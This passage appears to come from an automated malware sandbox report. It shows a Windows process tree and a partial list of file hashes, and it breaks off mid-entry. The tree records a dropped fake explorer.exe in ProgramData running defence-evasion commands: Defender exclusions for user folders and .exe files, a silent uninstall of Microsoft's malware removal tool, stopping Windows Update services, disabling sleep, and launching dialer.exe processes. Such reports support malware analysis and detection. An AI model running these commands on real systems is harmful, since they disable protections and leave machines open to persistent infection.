                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6392,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:8
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:2176
                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5392,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:8
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:2160
                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6424 /prefetch:8
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:6104
                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6484,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:2656
                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6360,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5200 /prefetch:8
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:3912
                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6396,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6408 /prefetch:8
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:3636
                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6096,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5856 /prefetch:8
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:5156
                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6340,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:8
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:1744
                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6292,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=820 /prefetch:8
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:8144
                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6348,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=820 /prefetch:8
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:6272
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:1732
                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                PID:5440
                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5060
                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:3556
                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:3740
                                                                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:3900
                                                                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4140
                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:4692
                                                                                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5616
                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:6124
                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5168
                                                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:2164
                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                PID:2256
                                                                                                                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                PID:1652
                                                                                                                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:3992
                                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:6092
                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:3116
                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:1036
                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2908
                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:1624
                                                                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:1956
                                                                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:3852
                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                PID:3076
                                                                                                                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                PID:3960
                                                                                                                                                                                                                              • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:684
                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4840
                                                                                                                                                                                                                                  • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                                                                                    C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:2788
                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:5536
                                                                                                                                                                                                                                      • C:\ProgramData\Windows\explorer.exe
                                                                                                                                                                                                                                        C:\ProgramData\Windows\explorer.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                        PID:1800
                                                                                                                                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                          PID:3452
                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:6008
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2176
                                                                                                                                                                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:1468
                                                                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                                PID:2004
                                                                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                                PID:5828
                                                                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                                PID:4824
                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:4916
                                                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                  PID:4672
                                                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                  PID:5796
                                                                                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Power Settings
                                                                                                                                                                                                                                                  PID:5248
                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4332
                                                                                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                                                    PID:1568
                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:5860
                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                      PID:368
                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                      PID:1944
                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:1556
                                                                                                                                                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:4060
                                                                                                                                                                                                                                                        • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:3704
                                                                                                                                                                                                                                                          • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                            dialer.exe
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:5488
                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:3444
                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:736
                                                                                                                                                                                                                                                              • C:\Windows\system32\BackgroundTaskHost.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:5756
                                                                                                                                                                                                                                                                • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                                                                                                                  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                  PID:2416

                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1071498887\LICENSE

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  ee002cb9e51bb8dfa89640a406a1090a

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  49ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  3dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1071498887\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  79B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  7f4b594a35d631af0e37fea02df71e72

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  f7bc71621ea0c176ca1ab0a3c9fe52dbca116f57

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  530882d7f535ae57a4906ca735b119c9e36480cbb780c7e8ad37c9c8fdf3d9b1

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  bf3f92f5023f0fbad88526d919252a98db6d167e9ca3e15b94f7d71ded38a2cfb0409f57ef24708284ddd965bda2d3207cd99c008b1c9c8c93705fd66ac86360

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-as.hyb

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  703B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  8961fdd3db036dd43002659a4e4a7365

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  7b2fa321d50d5417e6c8d48145e86d15b7ff8321

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  c2784e33158a807135850f7125a7eaabe472b3cfc7afb82c74f02da69ea250fe

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  531ecec11d296a1ab3faeb2c7ac619da9d80c1054a2ccee8a5a0cd996346fea2a2fee159ac5a8d79b46a764a2aa8e542d6a79d86b3d7dda461e41b19c9bebe92

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-hi.hyb

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  687B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  0807cf29fc4c5d7d87c1689eb2e0baaa

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  d0914fb069469d47a36d339ca70164253fccf022

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  f4df224d459fd111698dd5a13613c5bbf0ed11f04278d60230d028010eac0c42

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  5324fd47c94f5804bfa1aa6df952949915896a3fc77dccaed0eeffeafe995ce087faef035aecea6b4c864a16ad32de00055f55260af974f2c41afff14dce00f3

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-nb.hyb

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  141KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  677edd1a17d50f0bd11783f58725d0e7

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  98fedc5862c78f3b03daed1ff9efbe5e31c205ee

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  c2771fbb1bfff7db5e267dc7a4505a9675c6b98cfe7a8f7ae5686d7a5a2b3dd0

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  c368f6687fa8a2ef110fcb2b65df13f6a67feac7106014bd9ea9315f16e4d7f5cbc8b4a67ba2169c6909d49642d88ae2a0a9cd3f1eb889af326f29b379cfd3ff

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  82B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  2617c38bed67a4190fc499142b6f2867

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  a37f0251cd6be0a6983d9a04193b773f86d31da1

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  d571ef33b0e707571f10bb37b99a607d6f43afe33f53d15b4395b16ef3fda665

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  b08053050692765f172142bad7afbcd038235275c923f3cd089d556251482b1081e53c4ad7367a1fb11ca927f2ad183dc63d31ccfbf85b0160cf76a31343a6d0

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1786606208\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  85B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  c3419069a1c30140b77045aba38f12cf

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  11920f0c1e55cadc7d2893d1eebb268b3459762a

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  db9a702209807ba039871e542e8356219f342a8d9c9ca34bcd9a86727f4a3a0f

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  c5e95a4e9f5919cb14f4127539c4353a55c5f68062bf6f95e1843b6690cebed3c93170badb2412b7fb9f109a620385b0ae74783227d6813f26ff8c29074758a1

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\Notification\notification_fast.bundle.js.LICENSE.txt

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  551B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  7bf61e84e614585030a26b0b148f4d79

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  c4ffbc5c6aa599e578d3f5524a59a99228eea400

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  38ed54eb53300fdb6e997c39c9fc83a224a1fd9fa06a0b6d200aa12ea278c179

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  ca5f2d3a4f200371927c265b9fb91b8bcd0fbad711559f796f77b695b9038638f763a040024ed185e67be3a7b58fab22a6f8114e73fdbd1cccdda6ef94ff88f3

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\Tokenized-Card\tokenized-card.bundle.js.LICENSE.txt

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  8595bdd96ab7d24cc60eb749ce1b8b82

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  3b612cc3d05e372c5ac91124f3756bbf099b378d

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  363f376ab7893c808866a830fafbcd96ae6be93ec7a85fabf52246273cf56831

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  555c0c384b6fcfc2311b47c0b07f8e34243de528cf1891e74546b6f4cda338d75c2e2392827372dc39e668ed4c2fd1a02112d8136d2364f9cab9ee4fa1bd87f5

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-tokenized-card\fr-CA\strings.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  cd247582beb274ca64f720aa588ffbc0

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  4aaeef0905e67b490d4a9508ed5d4a406263ed9c

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  c67b555372582b07df86a6ce3329a854e349ba9525d7be0672517bab0ac14db5

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  bf8fa4bd7c84038fae9eddb483ae4a31d847d5d47b408b3ea84d46d564f15dfc2bae6256eac4a852dd1c4ad8e58bc542e3df30396be05f30ed07e489ebe52895

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  121B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  16f004af39a3675a73f5c15f6182a293

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  e7027edbadfd881e03d8a592ae661a985fd89cd7

                                                                                                                                                                                                                                                                  SHA256

